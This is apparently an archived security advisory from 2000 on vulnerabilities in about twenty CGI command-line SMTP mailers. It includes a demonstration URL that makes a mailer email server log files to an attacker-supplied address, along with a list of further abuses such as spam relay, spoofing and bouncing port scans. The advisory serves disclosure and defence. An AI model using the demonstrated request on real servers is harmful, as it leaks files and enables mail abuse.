Multiple Command Line SMTP Mailers Contain Vulnerabilities

Reported December 12, 2000 by XATO

VERSIONS AFFECTED

BatMail 1.8d http://www.on3.com/tools/nt/mailexe/
Blat 1.85h http://pages.infinit.net/che/blat/blat.html
CGIMail 2.5 http://www.nsiweb.com/cgisoftware/cgimail
CLEMAIL 1.3 http://sureshot.virtualave.net/clemail
Comments 1.7 http://www.greyware.com
FormVar 1.61 http://www.cgimachine.de
GBMail 2.02 http://gboban.hypermart.net
MailForm 1.96 http://www.lss.com.au
MailMe! 1.6 http://www.arclab.com
MailPost 5.1 http://www.mcenter.com/mailpost
MailSend 7.15 http://www.radiks.net/jimbo/share.html
MailSend 3.18 http://www.dataenter.co.at
NetFormDD 2.9 http://www.seedlingsoft.com
Postie 6 http://www.infradig.com
SendFile 1.0 http://www.tntsoftware.com
Stalkerlab's Mailers 1.2 http://www.stalkerlab.ch/SMailers
WindMail 3.05 http://www.geocel.com
WebMailer Pro 1.2 http://www.geocel.com
WebMailer Lite 1.2 http://www.geocel.com
wSendmail 1.5 http://www.jgaa.com/

DESCRIPTION

Multiple vulnerabilities have been discovered in command-line mailers. Vulnerabilities range from Denial of Service (DoS) attacks to information leakage and the writing and retrieving of unauthorized data.

DEMONSTRATION

If the mailer software is located in the /cgi-bin directory on the Web server, a user can launch it with the following URL:

http://yourserver/cgi-bin/mailer.exe

By adding a "-h" to the URL, as seen below, a user obtains a list of available options built into the mailer:

http://yourserver/cgi-bin/mailer.exe?-h

The following command causes the mailer software to email the malicious user any file specified. In the case of this example, the Web server emails log files.

-f%[email protected]%20-t%20me@example">http://yourserver/cgi-bin/mailer.exe?-f%20

[email protected]%20-t%20me@example. com%20-a%20c:\logs\web.log

Other issues discovered with the command-line mailer programs include the mailers also let malicious users specify the recipient and the sender, letting anyone use the server for unsolicited commercial email (UCE), flooding, mail bombing, resource draining, mail spoofing, and DoS.

Additionally, other problems include the ability to let INI and log files reside in the same directory as the mailer; override the default settings; modify hidden form variables; exploit debug modes; monitor all mail sent through the server; use the mailer as a bounce point for port scans; use the mailer as a bounce point for brute-force password attacks.

VENDOR RESPONSE

Check your vendors web site for fix and upgrade information.

CREDIT
Discovered by XATO

Multiple Command Line SMTP Mailers Contain Vulnerabilities

Comments

Plain text